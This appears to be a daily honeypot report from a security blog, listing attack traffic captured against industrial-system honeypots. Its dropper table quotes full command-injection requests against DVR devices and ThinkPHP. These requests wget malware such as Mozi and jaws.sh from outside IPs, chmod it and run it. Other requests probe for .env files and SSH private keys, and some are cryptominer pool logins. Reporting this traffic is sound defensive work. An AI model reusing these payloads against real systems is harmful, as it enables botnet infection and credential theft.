Skip to main content
  1. Daily-Posts/

Report: 2025-03-24

·720 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-25
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
FRDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
185.40.4.51POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
188.124.135.200GET /shell?cd+/tmp;rm+-rf+*;wget+http://188.124.135.200:55440/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
141.98.11.94GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/89.144.32.113/jaws.sh;chmod+777+jaws.sh;./jaws.sh HTTP/1.1
87.121.84.41POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1
123.157.136.106GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
60.249.212.60GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.84.71.195/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
185.196.220.57GET /shell?cd+/tmp;rm+-rf+x86;nohup+wget+http:/\x5C/87.121.84.145/bins/x86;chmod+777+x86;./x86;ulimit+-n+99999 HTTP/1.1
200.81.185.179GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://157.230.218.54/bins/nine.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
87.121.84.195POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20parm7%3B%20wget%20http%3A%2F%2F193.32.162.27%2Fbins%2Fparm7%3B%20chmod%20777%20parm7%3B%20.%2Fparm7%20sex HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2163GET /.env-sample HTTP/1.1
3991GET /.ssh/id_ed25519 HTTP/1.1
4121{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xc77c44e6124e2c41446efb056d8b1fff1075f979\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
4251{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2242UB7PjfDvPAorC1rLCmsbNLeTs6TkcV7LfeqSgHTAnpGwY28SZR5rWAGpPFWh6bGzDF5hrz6ujZ8dTuSfMnJvG37MUsgzg\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
4841GET /app/frontend/.env HTTP/1.1
4891\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xC1y\xE8\xCE\xF3\xC6\xFA}\x05\x02\x00\x01\x00\x00\xA1\xAA
4911\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xBB\x22\xA2;\x13\xCA\xCB\xD0\x0F;A\x18\xDB\x07 \x8B\xB5\xA9\x91\xC5\xE7R\xDD\xF9)\xAD[Zc\xE2b0>rO\xDA\x81\x07\x11\x83\x81\xEF.h\xE8U\xCE\xF5)zD
4941OPTIONS rtsp://xxx.xxx.xxx.xxx:80 RTSP/1.0
4991GET /index/function.php HTTP/1.1
5001GET /about/function.php HTTP/1.1
5011GET /doc/function.php HTTP/1.1
5021GET /admin/function.php HTTP/1.1
5031GET /mah/function.php HTTP/1.1
5041GET /as/function HTTP/1.1
5051GET /file/function.php HTTP/1.1
5061GET /plugins/function.php HTTP/1.1
5221GET /.env.test.local HTTP/1.1
5231GET /.env.sample.php HTTP/1.1
5281GET /.c9/metadata/environment/.env HTTP/1.1
5301GET /tests/test-become/.env HTTP/1.1
5321\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xFE\xAA\xB0\xDEgW\xB44\x05\x02\x00\x01\x00\x00\xA1\xAA
5341\x00\x00\x00\xE0Z\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x05\x01=K\x00\x00\x01\x01\x13\x01\xA8\xC0\xF0 \xFF$E\xFF/\x00admin\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x81\x89\x02\x81\x81\x00\xD5_\xA2\xFD\xF9\x14\xC5\xAD\x978\xD3\xC1y\xB6p\x06[\x1D?\xE1\xEB\xEAk\xBC/\x01\xC0!7c\x95\xB9\xCA\x97\xD9\xE9\xC1zS\xF2
5421\xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\x18\xF3\xCB\xC6\xAF\x92r\x09\x05\x02\x00\x01\x00\x00\xA1\xAA
5931GET /Odin/http/call1742784483 HTTP/1.1
5941GET /OdinHttpCall1742784483 HTTP/1.1
5961GET /odinhttpcall1742784483 HTTP/1.1
6091+/tmp/gpon80&ipv=0
6111{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22479qGnmGQ8zB4bYJvMMh9AHWSattuqZ6aQjA7VxXVg1fPpyuSU9vyVZaqtyN2R3a35QbahnhR1421f8s61Csgim6GYxFTiZ\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
6121{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220xd06fb9619b7f4dd934258f9e1e3b3e4356dead5e\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
6151GET /3-sequelize/final/.env HTTP/1.1
6161GET /31_structure_tests/.env HTTP/1.1
6441GET /clld_dir/.env HTTP/1.1
6451GET /ClientApp/.env HTTP/1.1
6461GET /client/src/.env HTTP/1.1
6681GET /?uri=/var/www/html/config.js HTTP/1.1
6791GET /client/mutual-fund-app/.env HTTP/1.1
6801GET /client-app/.env HTTP/1.1
6811GET /acme_challenges/.env HTTP/1.1
6821GET /chiminey/.env HTTP/1.1
6841GET /Assignment4/.env HTTP/1.1
6851GET /Assignment3/.env HTTP/1.1
6861GET /assets/.env HTTP/1.1
6871GET /asset_img/.env HTTP/1.1
6881GET /Archipel/.env HTTP/1.1
6891GET /apps/client/.env HTTP/1.1
6911GET /app2-static/.env HTTP/1.1
6921GET /app1-static/.env HTTP/1.1
6941GET /app/config/dev/.env HTTP/1.1
6971GET /app/client/.env HTTP/1.1
6981GET /app-order-client/.env HTTP/1.1
6991GET /app_nginx_static_path/.env HTTP/1.1
7001GET /app_dir/.env HTTP/1.1
7011GET /api/src/.env HTTP/1.1
7031GET /anaconda/..env HTTP/1.1
7051GET /agora/.env HTTP/1.1
7071GET /adminer/.env HTTP/1.1
7091GET /actions-server/.env HTTP/1.1
7101GET /acme/.env HTTP/1.1
7111GET /acme-challenge/.env HTTP/1.1
7131GET /back-end/app/.env HTTP/1.1
7161GET /chat-client/.env HTTP/1.1
7171GET /charts/liveObjects/.env HTTP/1.1
7181GET /challenges/.env HTTP/1.1
7191GET /challenge/.env HTTP/1.1
7211GET /ch8b-mytodo/.env HTTP/1.1
7221GET /ch8a-mytodo/.env HTTP/1.1
7231GET /ch8-mytodo/.env HTTP/1.1
7241GET /ch7a-mytodo/.env HTTP/1.1
7251GET /ch7-mytodo/.env HTTP/1.1
7261GET /ch6a-mytodo/.env HTTP/1.1
7271GET /ch6-mytodo/.env HTTP/1.1
7281GET /ch2-mytodo/.env HTTP/1.1
7291GET /cdw-backend/.env HTTP/1.1
7311GET /cardea/backend/.env HTTP/1.1
7321GET /bucoffea/.env HTTP/1.1
7331GET /bootstrap/.env HTTP/1.1
7341GET /bookchain-client/.env HTTP/1.1
7351GET /blue/.env HTTP/1.1
7371GET /blob/.env HTTP/1.1
7381GET /blankon/.env HTTP/1.1
7391GET /bitcoind/.env HTTP/1.1
7431GET /backendfinaltest/.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0424NL
1384BG
2305US
3287FR
4215GB
5143PL
6110DE
778HK
860TR
950VN
1045KZ
1145CA
1242CH
1328CN
1428NO
1526LT
1620SC
1716NG
1815JP
1914ZA
2014AU
2111BE
2210RU
2310PT
2410UA
258VE
267BR
276FI
286SA
296KR
305AO
315TH
325AR
335SG
344ID
354TW
363IN
373IR
383GH
392IT
402AM
412AZ
422MA
431SE
441RO
451MO
461HU
471AE
481MN

Related

Report: 2025-03-23
·2901 words
Repport Daily
Report: 2025-03-22
·4611 words
Repport Daily
Report: 2025-03-21
·7473 words
Repport Daily